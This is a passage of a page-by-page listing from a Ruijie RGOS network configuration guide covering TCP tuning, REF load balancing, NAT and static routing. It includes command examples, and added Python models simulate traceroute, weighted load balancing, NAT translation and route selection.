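    for ttl in range(1, max_hops + 1):
        responses = [send_probe(ttl, path, target) for _ in range(probes)]
        hops.append((ttl, responses))
        if target in responses:
            break
    return hops


def format_hops(hops) -> List[str]:
    """Render like the CLI: responder address per hop, '*' for each unanswered probe."""
    lines = []
    for ttl, responses in hops:
        addrs = {r for r in responses if r is not None}
        cell = " ".join(sorted(addrs)) if addrs else " ".join("*" * len(responses))
        lines.append("%2d  %s" % (ttl, cell))
    return lines


if __name__ == "__main__":
    for line in format_hops(traceroute(PATH, TARGET)):
        print(line)
```

A hop that prints `* * *` is not necessarily down: the simulation shows that a router which forwards normally but does not generate ICMP time exceeded looks exactly the same as a lost probe, and the trace still completes once the TTL outlives that router.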
  • Page 496 Configuration Guide Configuring TCP 8 Configuring TCP 8.1 Overview The Transmission Control Protocol (TCP) is a transport-layer protocol providing reliable, connection-oriented, IP-based services for the application layer. Application data is passed as a stream of 8-bit bytes from the application layer to the TCP layer, which divides it into segments of a proper length.
  • Page 497: Scenario

    8.2.1 Optimizing TCP Performance Scenario For example, a TCP connection is established between A and D, as shown in the following figure. The MTU of the link between A and B is 1500 bytes, 1300 bytes between B and C, and 1500 bytes between C and D. To optimize TCP transmission performance, packet fragmentation should be avoided between B and C.
  • Page 498 8.3 Features Basic Concepts - TCP Header Format 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Source Port Destination Port...
  • Page 499 - The 16-bit Window value is used for flow control. It specifies the amount of data that the peer may transmit between ACK packets. - Checksum is a 16-bit checksum. - Urgent Pointer is 16 bits long and points to the end of the urgent data so that interrupted data flows can continue. When the URG bit is set, the data is given priority over other data flows.
  • Page 500 Related Configuration - Configuring TCP SYN Timeout - The default TCP SYN timeout is 20 seconds. - Run the ip tcp synwait-time seconds command in global configuration mode to configure a SYN timeout ranging from 5 to 300 seconds. ...
  • Page 501 8.3.3 Configuring Reset Packet Sending Working Principle When TCP packets are distributed to applications, if the TCP connection that a packet belongs to cannot be identified, the local end sends a reset packet to the peer to terminate the TCP connection. Attackers may use port unreachable messages to attack the device.
  • Page 502 - Run the ip tcp mss max-segment-size command in global configuration mode to set an MSS. It ranges from 68 to 1000 bytes. By default, the MSS is calculated based on the MTU. If an MSS is configured, the effective MSS is the smaller of the calculated MSS and the configured MSS.
  • Page 503 - To avoid packet fragmentation in the case of a small path MTU, you may configure an MSS for TCPv4 SYN packets. The MSS in TCPv4 SYN packets will be changed to the configured value once the device receives the packets. You may configure an MSS value with reference to the interface MTU.
  • Page 504 In version 10.x, the configuration applies only to IPv4 TCP. In version 11.0 or later, it applies to both IPv4 TCP and IPv6 TCP. The service tcp-keepalives-in command is used in version 10.x to enable keepalive on the TCP server. It is deprecated but still supported in version 11.0.
  • Page 505 - Optional. - Configure this on both ends of the TCP connection. - Configuring TCP Window Size - Optional. - Configure this on both ends of the TCP connection. - Configuring the Sending of TCP Reset Packets After Receiving Port Unreachable Messages. ...
  • Page 506 in continuous SYN flooding. When a device actively makes a request for a connection with an external device, through telnet for example, shortening the SYN timeout reduces the user's wait time. You may prolong the SYN timeout on a poor network. ...
  • Page 507 Run the show tcp pmtu command to display the IPv4 TCP PMTU. Ruijie# show tcp pmtu Number Local Address Foreign Address PMTU 192.168.195.212.23 192.168.195.112.13560 1440 Run the show ipv6 tcp pmtu command to display the IPv6 TCP PMTU. Ruijie# show ipv6 tcp pmtu Number Local Address Foreign Address PMTU...
  • Page 508 Enable PMTUD for a TCP connection. Adopt the default age timer settings. Configuration Steps Ruijie# configure terminal Ruijie(config)# ip tcp path-mtu-discovery Ruijie(config)# end Verification Run the show tcp pmtu command to display the IPv4 TCP PMTU. 1000::1:23 1000::2.13560...
  • Page 509 If the user receives no TCP packets from the other end after sending keepalive packets four times, the TCP connection is considered inactive. Ruijie# configure terminal Ruijie(config)# ip tcp keepalive interval 60 times 4 idle-period 180 Ruijie(config)# end Verification A user logs in to a device through telnet, and then shuts down the local device.
  • Page 510 Command Description show ipv6 tcp pmtu [local-ipv6 X:X:X:X::X] [local-port num] [peer-ipv6 X:X:X:X::X] [peer-port num] Displays IPv6 TCP PMTU. show ipv6 tcp port [num] Displays IPv6 TCP port information. Debugging System resources are occupied when debugging information is output. Therefore, disable debugging immediately after use.
  • Page 511: Load Balancing

    9.1 Overview On products incapable of hardware-based forwarding, IPv4/IPv6 packets are forwarded through software. To optimize software-based forwarding performance, Ruijie introduces IPv4/IPv6 express forwarding through software (Ruijie Express Forwarding, namely REF). REF maintains two tables: a forwarding table and an adjacency table. The forwarding table stores route information. The adjacency table is derived from the ARP table and the IPv6 neighbor table, and it contains the Layer 2 rewrite (MAC) information for the next hop.
  • Page 512 Configuration Guide Configuring IPv4/IPv6 REF Figure 9-1 Remarks A is a router that runs REF. B, C and D are forwarding devices. Deployment - Run REF on router A. 9.3 Features Basic Concepts IPv4/IPv6 REF involves the following basic concepts: ...
  • Page 513 - Packet forwarding path Packets are forwarded based on their IPv4/IPv6 addresses. If the source and destination IPv4/IPv6 addresses of a packet are specified, the forwarding path of this packet is determined. 9.3.1 Load Balancing Policies Load balancing is configured to distribute traffic load among multiple network links.
  • Page 514 9.4.1 Configuring Load Balancing Policies Configuration Effect REF supports the following two kinds of load balancing policies: - Destination address-based load balancing performs a hash calculation based on the destination address of the packet. The path with a greater weight is more likely to be selected. This policy is used by default. ...
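How the two policies differ in practice is easier to see with a small model of weighted hash-based next-hop selection. The Python script below is an added example, not code from the Ruijie manual or from REF itself: it hashes either the destination address alone (the default policy) or the source and destination pair, maps the hash onto slots sized by each next hop's weight, and counts where a set of constructed flows lands. The CRC32 hash, the slot layout and the sample next hops with their weights are assumptions for illustration; the device's actual hash function is not documented on this page.

```python
# Added example (not from the Ruijie manual): next-hop selection for the two
# REF load-balancing policies. The hash function (CRC32) and the weighted
# slot layout are assumptions for illustration, not the device's own.
import ipaddress
import zlib
from collections import Counter
from typing import Dict, List, Tuple

# (link name, next-hop address, weight): constructed sample; link3 has double weight.
NEXT_HOPS: List[Tuple[str, str, int]] = [
    ("link1", "10.0.1.1", 1),
    ("link2", "10.0.2.1", 1),
    ("link3", "10.0.3.1", 2),
]


def flow_hash(src: str, dst: str, policy: str) -> int:
    """Hash only the destination ('dst') or the source+destination pair ('src-dst')."""
    dst_bytes = ipaddress.ip_address(dst).packed      # works for IPv4 and IPv6
    if policy == "dst":
        key = dst_bytes
    elif policy == "src-dst":
        key = ipaddress.ip_address(src).packed + dst_bytes
    else:
        raise ValueError("policy must be 'dst' or 'src-dst'")
    return zlib.crc32(key) & 0xFFFFFFFF


def select_next_hop(src: str, dst: str, next_hops, policy: str = "dst") -> str:
    """Map the hash onto weighted slots: a weight-2 link owns twice as many slots."""
    total = sum(w for _, _, w in next_hops)
    if total <= 0:
        raise ValueError("no usable next hop")
    slot = flow_hash(src, dst, policy) % total
    for name, _addr, weight in next_hops:
        if slot < weight:
            return name
        slot -= weight
    raise AssertionError("unreachable: slot is always below the weight total")


def distribution(flows, next_hops, policy: str) -> Dict[str, int]:
    """Count how many flows land on each link under a policy."""
    return dict(Counter(select_next_hop(s, d, next_hops, policy) for s, d in flows))


if __name__ == "__main__":
    # Constructed flows: twenty sources talking to one destination.
    flows = [("192.0.2.%d" % i, "203.0.113.10") for i in range(1, 21)]
    print("dst policy     :", distribution(flows, NEXT_HOPS, "dst"))
    print("src-dst policy :", distribution(flows, NEXT_HOPS, "src-dst"))
```

With the default destination-based policy every flow to the same destination is pinned to one link, which is why that policy cannot spread a single busy destination across paths; the source-plus-destination policy keys on the pair and can use all three links while still keeping each individual flow on one path.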
  • Page 515: Scenario

    Configuration Example - Configuring Load Balancing Based on Source and Destination IP Addresses Scenario Figure 9-2 A route prefix is associated with three next hops on router A, namely, link 1, link 2, and link 3. Configuration Configure load balancing based on IPv4 source and destination IP addresses on router A.
  • Page 516 punt bcast : 0 9.5 Monitoring Displaying REF Packet Statistics REF packet statistics include the number of forwarded packets and the number of packets discarded for various reasons. You can determine whether packets are forwarded as expected by displaying and clearing REF packet statistics. Command Description show ip ref packet statistics...
  • Page 517 Displaying Packet Forwarding Path Information Packets are forwarded based on their IPv4/IPv6 addresses. If the source and destination IPv4/IPv6 addresses of a packet are specified, the forwarding path of this packet is determined. Run the following commands and specify the IPv4/IPv6 source and destination addresses of a packet.
  • Page 518: Scenario

    Configuration Guide Configuring NAT 10 Configuring NAT 10.1 Overview Network Address Translation (NAT) is a process of translating the IP address in the header of an IP data packet into another IP address. In practice, NAT enables private networks that use unregistered IP addresses to access public networks.
  • Page 519: Scenario

    The egress router connects both the intranet and the extranet. Corresponding Protocols - Configure an inside interface and an outside interface for NAT. - Configure static inside source address translation on the egress router. 10.2.2 External Users' Access to an Intranet Server Scenario A PC is located in an extranet while a server (such as a Web server) is located in an intranet, as shown in Figure 10-2.
  • Page 520: Scenario

    Configuration Guide Configuring NAT Corresponding Protocols  Configure an inside interface and an outside interface for NAT.  Configure server port address translation rules on the egress router. 10.2.3 Source/Destination Address Translation for Internal Users Scenario PC 1 is located in private network 1 while PC 2 is located in private network 2, as shown in Figure 10-3. Because the two private networks are separately managed, address overlapping occurs in their IP network segments.
  • Page 521 Configuration Guide Configuring NAT Figure 10-4 The egress router connects both the intranet and the extranet. The servers are deployed in the intranet. Corresponding Protocols  Configure an inside interface and an outside interface for NAT.  Configure TCP load balancing using NAT on the egress router. 10.3 Features Basic Concepts ...
  • Page 522 Configuration Guide Configuring NAT  Dynamic NAT Dynamic NAT establishes temporary mapping relationships between inside local addresses and inside global addresses. A temporary mapping is removed after it has been idle for a certain period of time. Dynamic NAT can be configured in the following case: an intranet only accesses extranet services but does not provide any, and the number of intranet hosts is greater than the number of global IP addresses.
  • Page 523: Scenario

    Configuration Guide Configuring NAT  Use the ip nat { inside | outside } command to configure the interfaces as connected to the inside and outside.  NAT does not work on a data packet unless a route exists between the outside interface and the inside interface and the data packet meets a certain rule.
  • Page 524 Configuration Guide Configuring NAT  Run the ip nat { inside | outside } command to specify a pair of NAT interfaces.  NAT does not work on a data packet unless a route exists between the outside interface and the inside interface and the data packet meets a certain rule.
  • Page 525 Configuration Guide Configuring NAT  Static/dynamic basic NAT or static/dynamic NAPT can be used for inside source address translation. For details, see the "Basic NAT" and "NAPT" sections.  Configuring Static Translation of Outside Source Address  Static translation of outside source address is not configured by default. ...
  • Page 526 Configuration Guide Configuring NAT  No address pool is configured by default.  Use the ip nat pool address-pool start-address end-address { netmask mask | prefix-length prefix-length } command to configure an IP address pool for NAT.  Configuring the ACL ...
  • Page 527 Configuration Guide Configuring NAT 10.3.6 ALG Common NAT can translate the IP address and port in the header of a UDP or TCP packet, but it cannot translate addresses or ports carried inside application-layer payloads. In many application layer protocols, such as multimedia protocols (H.323 and the like), FTP, and SQLNET, the TCP/UDP payload carries address or port information.
  • Page 528 Configuration Guide Configuring NAT
    ip nat inside source static local-address global-address [ permit-inside ] [ netmask mask ] [ match interface ]: Defines the static inside source address translation relationship.
    Optional configuration. It is used to configure dynamic NAT.
    ip nat pool address-pool start-address end-address netmask mask...
  • Page 529 Configuration Guide Configuring NAT
    ip nat inside source list access-list-number { [ pool address-pool ] | [ interface interface-type interface-number ] } overload: Defines the dynamic source address translation relationship. The overload parameter may be omitted; it is used only to keep compatibility with mainstream vendors' configuration.
  • Page 530 Configuration Guide Configuring NAT
    access-list access-list-number permit ip-address wildcard: Defines an ACL, which matches the virtual host address only. Ensure that the ACL is an extended ACL based on destination IP address matching.
    ip nat inside destination list: Defines the dynamic inside destination address translation relationship.
  • Page 531 Configuration Guide Configuring NAT  Configure the LAN interface to connect to the intranet as the NAT inside interface unless otherwise stated.  Configuring the NAT Outside Interface  Mandatory configuration.  Configure the WAN interface to connect to the extranet as the NAT outside interface unless otherwise stated. ...
  • Page 532: Scenario

    Configuration Guide Configuring NAT  Configuring the Address Pool Command ip nat pool address-pool start-address end-address { netmask mask | prefix-length prefix-length } Syntax Parameter address-pool: name of the address pool Description start-address: start IP address end-address: end IP address netmask mask: network mask of the addresses prefix-length prefix-length: length of the network mask of the addresses Command...
  • Page 533: Scenario

    A(config)# ip nat pool net200 200.168.12.2 200.168.12.100 netmask 255.255.255.0
    A(config)# ip nat inside source list 1 pool net200
    A(config)# access-list 1 permit 192.168.12.0 0.0.0.255
    Verification: Use the show command to display the configuration.
    Ruijie# show ip nat translations
    Pro Inside global          Inside local          Outside local       Outside global
    tcp 200.168.12.200:2063    192.168.12.65:2063    168.168.12.1:23     168.168.12.1:23...
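    The following is an added illustration, not part of the guide and not RGOS code: a small Python model of the dynamic NAT rule configured above (ACL 1 permitting 192.168.12.0/24, pool net200, with and without overload). It shows which packets the rule touches, how a translation entry is created by the first outbound packet, why return traffic for an existing entry is passed while unsolicited inbound traffic is dropped, and what basic dynamic NAT does when the pool is exhausted. The first translated port (1024) and the Packet fields are assumptions of the model.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    """Constructed 5-tuple; enough to show the translation, no real packet parsing."""
    proto: str
    src: str
    sport: int
    dst: str
    dport: int


class Napt:
    """Model of 'ip nat inside source list <acl> pool <pool> [overload]' (illustration, not RGOS code)."""

    def __init__(self, acl, pool_start, pool_end, overload=True, first_port=1024):
        # access-list 1 permit 192.168.12.0 0.0.0.255: ipaddress accepts the wildcard as a hostmask
        self.acl = ipaddress.IPv4Network(acl)
        start = int(ipaddress.IPv4Address(pool_start))
        end = int(ipaddress.IPv4Address(pool_end))
        self.pool = [str(ipaddress.IPv4Address(i)) for i in range(start, end + 1)]
        self.overload = overload
        self.next_port = first_port  # assumed starting point for translated ports
        self.out = {}   # (proto, inside local, local port) -> (inside global, global port)
        self.back = {}  # (proto, inside global, global port) -> (inside local, local port)

    def _allocate(self, pkt):
        if self.overload:
            # NAPT: one global address shared by many sessions, told apart by the translated port
            mapping = (self.pool[0], self.next_port)
            self.next_port += 1
            return mapping
        # basic dynamic NAT: one pool address per inside host, source port preserved
        for (_, il, _), (ig, _) in self.out.items():
            if il == pkt.src:
                return (ig, pkt.sport)  # this host already holds a pool address
        used = {ig for ig, _ in self.out.values()}
        free = [a for a in self.pool if a not in used]
        return (free[0], pkt.sport) if free else None

    def outbound(self, pkt):
        """Packet received on the inside interface and routed to the outside interface."""
        if ipaddress.IPv4Address(pkt.src) not in self.acl:
            return pkt  # the ACL does not match: forwarded without translation
        key = (pkt.proto, pkt.src, pkt.sport)
        if key not in self.out:
            mapping = self._allocate(pkt)
            if mapping is None:
                return None  # pool exhausted (basic dynamic NAT): the packet is dropped
            self.out[key] = mapping
            self.back[(pkt.proto,) + mapping] = (pkt.src, pkt.sport)
        ig, gport = self.out[key]
        return Packet(pkt.proto, ig, gport, pkt.dst, pkt.dport)

    def inbound(self, pkt):
        """Packet received on the outside interface; only traffic with a translation entry gets in."""
        hit = self.back.get((pkt.proto, pkt.dst, pkt.dport))
        if hit is None:
            return None  # no entry: unsolicited inbound traffic never reaches an inside host
        return Packet(pkt.proto, pkt.src, pkt.sport, hit[0], hit[1])

    def translations(self):
        """Rows in the column order of 'show ip nat translations' (Pro, Inside global, Inside local)."""
        return [(proto, f"{ig}:{gp}", f"{il}:{lp}") for (proto, il, lp), (ig, gp) in self.out.items()]
```

    With overload every inside host is hidden behind the first pool address, so the only thing an outside peer can learn is a translated port; without overload each inside host consumes a whole pool address and the third host in a two-address pool gets no connectivity, which is the case the guide's "number of intranet hosts greater than the number of global IP addresses" sentence is about.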
  • Page 534 Configuration Guide Configuring NAT  Optional configuration.  Configure static NAPT in global configuration mode when a small number of users in the intranet need to access the extranet.  Configuring Dynamic NAPT  Optional configuration.  Configure dynamic NAPT in global configuration mode when a large number of users in the intranet need to access the extranet.
  • Page 535: Scenario

    Configuration Guide Configuring NAT Syntax prefix-length prefix-length } Parameter address-pool: name of the address pool Description start-address: start IP address end-address: end IP address netmask mask: network mask of the addresses prefix-length prefix-length: length of the network mask of the addresses Command Global configuration mode Mode...
  • Page 536
    A(config)# access-list 1 permit 192.168.12.0 0.0.0.255
    A(config)# ip nat inside source static tcp 192.168.12.3 80 200.198.12.1 80
    Verification: Use the show command to display the configuration.
    Ruijie# show ip nat translations
    Pro Inside global          Inside local          Outside local       Outside global
    tcp 200.168.12.200:2063    192.168.12.65:2063    168.168.12.1:23     168.168.12.1:23...
  • Page 537 Configuration Guide Configuring NAT  Unless otherwise noted, the interface connecting intranet should be configured as the NAT inside interface.  Configuring the NAT Outside Interface  Mandatory configuration.  Unless otherwise noted, the interface connecting extranet should be configured as the NAT outside interface. ...
  • Page 538 Configuration Guide Configuring NAT Syntax Parameter global-address: outside global address Description local-address: inside local address Command Global configuration mode Mode Configuration Usage  Configuring Static Translation of Outside Source Address and Port Command ip nat outside source static { tcp global-address global-port | udp global-address global-port } Syntax local-address local-port Parameter...
  • Page 539: Scenario

    A(config)# access-list 1 permit 192.168.12.0 0.0.0.255
    A(config)# ip nat outside source static 192.168.12.3 172.16.10.1
    A(config)# ip route 172.16.10.0 255.255.255.0 200.198.12.2
    Verification: Use the show command to display the configuration.
    Ruijie# show ip nat translations
    Pro Inside global          Inside local          Outside local       Outside global
    tcp 200.168.12.200:2063    192.168.12.65:2063    172.16.10.1:23      168.168.12.3:23...
  • Page 540 Configuration Guide Configuring NAT  No static route is configured or no IP address is configured for the outside interface, so that the router does not know to which interface a data packet should be sent after NAT or from which interface a data packet is received after NAT.
  • Page 541: Scenario

    Configuration Guide Configuring NAT Parameter address-pool: name of the address pool Description start-address: start IP address end-address: end IP address netmask mask: network mask of the addresses prefix-length prefix-length: length of the network mask of the addresses type rotary: type of the NAT address pool. Type rotary indicates that the chance of assigning any address is equal.
  • Page 542
    A(config)# ip nat inside destination list 100 pool realhosts
    A(config)# access-list 100 permit ip any host 10.10.10.100
    Verification: Use the show command to display the configuration.
    Ruijie# show ip nat translations
    Pro Inside global       Inside local      Outside local             Outside global
    tcp 10.10.10.100:23     10.10.10.2:23     100.100.100.100:1178      100.100.100.100:1178...
  • Page 543 Configuration Guide Configuring NAT  Configuring the NAT Outside Interface  Mandatory configuration.  Unless otherwise noted, the interface connecting extranet should be configured as the NAT outside interface.  Configuring Static NAT  Optional configuration.  Configure static NAT in global configuration mode when a small number of users in the intranet need to access the extranet.
  • Page 544 Configuration Guide Configuring NAT Command Global configuration mode Mode Configuration Usage  Configuring the Address Pool Command ip nat pool address-pool start-address end-address { netmask mask | prefix-length prefix-length } Syntax Parameter address-pool: name of the address pool Description start-address: start IP address end-address: end IP address netmask mask: network mask of the addresses prefix-length prefix-length: length of the network mask of the addresses...
  • Page 545: Scenario

    A(config)# ip nat inside source list 1 pool net200
    A(config)# access-list 1 permit 192.168.12.0 0.0.0.255
    A(config)# ip nat translation ftp 23
    Verification: Use the show command to display the configuration.
    Ruijie# show ip nat translations
    Pro Inside global          Inside local          Outside local       Outside global
    tcp 200.168.12.200:2063    192.168.12.65:2063    168.168.12.1:23     168.168.12.1:23...
  • Page 546 Configuration Guide Configuring NAT Notes  At least one inside interface and one outside interface need to be configured for special NAT applications.  The newly configured NAT rules take effect on new flows only but not on any existing flows. Configuration Steps ...
  • Page 547 Configuration Guide Configuring NAT Configuration NAT does not work on a data packet unless a route exists between the outside interface and the inside Usage interface and the data packet meets a certain rule. Therefore, at least one inside interface and one outside interface need to be configured on the router.
  • Page 548: Scenario

    Configuration Guide Configuring NAT Description global-address: outside address permit-inside: permits intranet users to access the local-ip host using global-ip. netmask mask: network-segment-to-network-segment address match interface: specifies the egress interface. Command Global configuration mode Mode Configuration Usage Configuration Example  Implementing the DNS Relay Service Scenario Figure 10-10 Configuration...
  • Page 549 Configuration Guide Configuring NAT Common Errors  The inside or outside interface is not configured. 10.4.7 Configuring the Interval at Which NAT Sends Gratuitous ARP Packets Networking Requirements Configure the interval at which gratuitous ARP packets are sent from addresses in the NAT address pool, so as to avoid address conflicts.
  • Page 550 Configuration Guide Configuring NAT Commands  Configuring the NAT Inside Interface and the NAT Outside Interface Command ip nat { inside | outside } Syntax Parameter inside: inside interface Description outside: outside interface Command Interface configuration mode Mode Configuration NAT does not work on a data packet unless a route exists between the outside interface and the inside Usage interface and the data packet meets a certain rule.
  • Page 551: Scenario

    Configuration Guide Configuring NAT Command Global configuration mode Mode Configuration Usage  Configuring the Interval at Which NAT Sends Gratuitous ARP Packets Command ip nat keepalive [ keealive_out ] Syntax Parameter keealive_out: the interval at which gratuitous ARP packets are sent from the local address of NAT. Description Command Global configuration mode...
  • Page 552 Configuration Guide Configuring NAT
    A(config)# ip nat inside source list 1 pool net200
    A(config)# access-list 1 permit 192.168.12.0 0.0.0.255
    A(config)# ip nat keepalive 10
    Verification
    Common Errors
     The inside or outside interface is not configured.
     The NAT rule is incorrect.
    10.5 Monitoring Clearing Configuration None.
  • Page 554 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 IP Routing Configuration 1. Managing Routes 2. Configuring FPM...
  • Page 555: Scenario

    Configuration Guide Managing Routes 1 Managing Routes 1.1 Overview The network service module (NSM) manages the routing table, consolidates routes sent by various routing protocols, and selects and sends preferred routes to the routing table. Routes discovered by various routing protocols are stored in the routing table.
  • Page 556: Scenario

    Configuration Guide Managing Routes Deployment  Configure the address and subnet mask of each interface.  Configure static routes on R 1, R 2, and R 3. 1.2.2 Floating Static Route Scenario If no dynamic routing protocol is configured, you can configure floating static routes to switch routes dynamically and so prevent the communication interruption that a network connection failure would otherwise cause.
  • Page 557: Scenario

    Configuration Guide Managing Routes Deployment  Configure the address and subnet mask of each interface.  Configure static routes on R 1, R 2, and R 3. 1.2.3 Load Balancing Static Route Scenario If there are multiple paths to the same destination, you can configure load balancing routes. Unlike floating routes, the administrative distances of load balancing routes are the same.
  • Page 558 Configuration Guide Managing Routes Remarks On the switch, the load is balanced based on the destination IP address by default. On a router, run the ip ref load-sharing original command to configure the load balancing policy of IPv4 routes, or the ipv6 ref load-sharing original command to configure the load balancing policy of IPv6 routes. Deployment ...
  • Page 559 Configuration Guide Managing Routes 1.3.2 Optimal Route Selection Administrative Distance When multiple routing protocols generate routes to the same destination, the priorities of these routes can be determined based on the administrative distance. A smaller administrative distance indicates a higher priority. Equal-Cost Route If multiple routes to the same destination have different next hops but the same administrative distance, these routes are mutually equal-cost routes.
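    As an added example (not from the guide and not RGOS code), the selection rules above can be exercised in Python: the lowest administrative distance wins, a floating static route with a higher distance takes over when the primary is withdrawn, equal-distance routes with different next hops form an equal-cost group, and a destination-based pick is made inside that group. The max_paths cap models the maximum number of equal-cost routes (the guide's default is 32); the destination hash (address modulo group size) is the model's own choice, not the RGOS algorithm.

```python
import ipaddress
from collections import defaultdict


class Rib:
    """Model of optimal route selection: administrative distance, floating static routes
    and equal-cost next hops (constructed illustration, not RGOS code)."""

    def __init__(self, max_paths=32):
        self.max_paths = max_paths  # maximum number of equal-cost routes; the guide's default is 32
        self.candidates = defaultdict(list)  # prefix -> [(distance, next hop, interface)]

    def add(self, prefix, next_hop, interface, distance=1):
        """Like 'ip route <network> <mask> <interface> <next hop> [distance]'; static routes default to 1."""
        self.candidates[ipaddress.ip_network(prefix)].append((distance, next_hop, interface))

    def remove(self, prefix, next_hop):
        """Withdraw one candidate, e.g. when the link towards that next hop fails."""
        net = ipaddress.ip_network(prefix)
        self.candidates[net] = [c for c in self.candidates[net] if c[1] != next_hop]

    def _group(self, net):
        cands = self.candidates.get(net, [])
        if not cands:
            return []
        best = min(d for d, _, _ in cands)  # smaller administrative distance, higher priority
        group = [(nh, ifc) for d, nh, ifc in cands if d == best]  # equal-cost routes
        return group[: self.max_paths]

    def active(self, prefix):
        """Routes installed for one prefix: the lowest distance wins; ties form the equal-cost group."""
        return self._group(ipaddress.ip_network(prefix))

    def lookup(self, dst):
        """Longest-prefix match, then a destination-based choice inside the equal-cost group.
        The modulo hash is the model's own choice; the guide only says the load is balanced on
        the destination IP address by default."""
        addr = ipaddress.ip_address(dst)
        matches = [n for n in self.candidates if addr in n and self._group(n)]
        if not matches:
            return None
        net = max(matches, key=lambda n: n.prefixlen)
        group = self._group(net)
        return group[int(addr) % len(group)]
```

    The floating route never shows up in the active set while the distance-1 route exists, which is why a "show ip route" on a healthy network does not reveal the backup; it appears only after the primary is withdrawn.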
  • Page 560 Configuration Guide Managing Routes
    Configuring a Static Route: (Mandatory) It is used to configure a static route entry.
    ip route: Configures an IPv4 static route.
    ipv6 route: Configures an IPv6 static route.
    (Optional) It is used to configure the default gateway.
    ip default gateway: Configures an IPv4 default gateway on a L2 device.
  • Page 561 Configuration Guide Managing Routes  Configuration Steps  Configuring a Static IPv4 Route Configure the following command on an IPv4-enabled device. Command ip route network net-mask { ip-address | interface [ ip-address ] } [ distance ] [ tag tag ] [ permanent ] [ weight number ] [description description-text] [ disabled | enabled] [ global ] Parameter network...
  • Page 562 Configuration Guide Managing Routes length. ipv6-address (Optional) Indicates the next-hop address of the static route. You must specify at least one of ipv6-address and interface, or both of them. If ipv6-address is not specified, a static direct route is configured. interface (Optional) Indicates the next-hop exit interface of the static route.
  • Page 563: Scenario

    Configuration Guide Managing Routes Scenario Figure 1-4
     Configure interface addresses on each device.
    Configuration Steps
    R1# configure terminal
    R1(config)# interface gigabitEthernet 0/0
    R1(config-if-GigabitEthernet 0/0)# ip address 1.1.1.1 255.255.255.0
    R1(config-if-GigabitEthernet 0/0)# exit
    R1(config)# interface gigabitEthernet 0/2
    R1(config-if-GigabitEthernet 0/2)# ip address 1.1.12.1 255.255.255.0
    R1(config-if-GigabitEthernet 0/2)# exit
    R1(config)# interface gigabitEthernet 0/3
    R1(config-if-GigabitEthernet 0/3)# ip address 1.1.13.1 255.255.255.0...
  • Page 564 Configuration Guide Managing Routes
     Configure static routes on each device.
    R1# configure terminal
    R1(config)# ip route 1.1.2.0 255.255.255.0 GigabitEthernet 0/2 1.1.12.2
    R1(config)# ip route 1.1.3.0 255.255.255.0 GigabitEthernet 0/3 1.1.13.3
    R2# configure terminal
    R2(config)# ip route 1.1.1.0 255.255.255.0 GigabitEthernet 0/1 1.1.12.1
    R2(config)# ip route 1.1.3.0 255.255.255.0 GigabitEthernet 0/3 1.1.23.3
    R3# configure terminal
    R3(config)# ip route 1.1.2.0 255.255.255.0 GigabitEthernet 0/2 1.1.23.2...
  • Page 565: Scenario

    Configuration Guide Managing Routes
    1.1.3.0/24 [1/0] via 1.1.23.3, GigabitEthernet 0/3
    1.1.12.0/24 is directly connected, GigabitEthernet 0/1
    1.1.12.2/32 is local host.
    1.1.23.0/24 is directly connected, GigabitEthernet 0/3
    1.1.23.2/32 is local host.
    R3# show ip route
    Codes: C - Connected, L - Local, S - Static
           R - RIP, O - OSPF, B - BGP, I - IS-IS
           N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
           E1 - OSPF external type 1, E2 - OSPF external type 2...
  • Page 566 Configuration Guide Managing Routes
    R2(config-if-GigabitEthernet 0/0)# ipv6 address 1111:2323::1/64
    R2(config-if-GigabitEthernet 0/0)# exit
    R2(config)# interface gigabitEthernet 0/1
    R2(config-if-GigabitEthernet 0/1)# ipv6 address 1111:1212::2/64
     Configure static routes on each device.
    R1# configure terminal
    R1(config)# ipv6 route 1111:2323::0/64 gigabitEthernet 0/1
    R2# configure terminal
    R2(config)# ipv6 route 1111:1111::0/64 gigabitEthernet 0/1
    ...
  • Page 567 Configuration Guide Managing Routes
    1111:2323::/64 via GigabitEthernet 0/0, directly connected
    1111:2323::1/128 via GigabitEthernet 0/0, local host
    1111:1212::/64 via GigabitEthernet 0/1, directly connected
    1111:1212::1/128 via GigabitEthernet 0/1, local host
    1111:1111::/64 [1/0] via GigabitEthernet 0/1, directly connected
    FE80::/10 via ::1, Null0
    FE80::/64 via GigabitEthernet 0/0, directly connected
    FE80::2D0:F8FF:FEFB:C092/128 via GigabitEthernet 0/0, local host
    FE80::/64 via GigabitEthernet 0/1, directly connected
    FE80::2D0:F8FF:FEFB:C092/128 via GigabitEthernet 0/1, local host...
  • Page 568 Configuration Guide Managing Routes hop in the routing table. distance (Optional) Indicates the administrative distance of the static route. The administrative distance is 1 by default. (Optional) Indicates the tag of the static route. The tag is 0 by default. permanent (Optional) Indicates the flag of the permanent route.
  • Page 569: Scenario

    Configuration Guide Managing Routes Defaults By default, no static default route is configured. Command Global configuration mode Mode Usage Guide The simplest configuration of this command is ipv6 route ::/0 ipv6-gateway  Configuring the IPv4 Default Network on a L3 Device Command ip default-network network Parameter...
  • Page 570 Configuration Guide Managing Routes
    R2(config-if-GigabitEthernet 0/0)# ip address 1.1.2.1 255.255.255.0
    R2(config-if-GigabitEthernet 0/0)# exit
    R2(config)# interface gigabitEthernet 0/1
    R2(config-if-GigabitEthernet 0/1)# ip address 1.1.12.2 255.255.255.0
    R2(config-if-GigabitEthernet 0/1)# exit
     Configure an IPv4 default route (0.0.0.0/0) on R 1 and R 2.
    R1# configure terminal
    R1(config)# ip route 0.0.0.0 0.0.0.0 GigabitEthernet 0/1 1.1.12.2
    R2# configure terminal
    R2(config)# ip route 0.0.0.0 0.0.0.0 GigabitEthernet 0/1 1.1.12.1
    ...
  • Page 571 Configuration Guide Managing Routes Defaults By default, the number of equal cost routes is 32. Command Global configuration mode Mode Usage Guide Run this command to configure the maximum number of next hops in the equal-cost route. In load balancing mode, the number of routes on which traffic is balanced does not exceed the configured number of equal-cost routes.
  • Page 572: Scenario

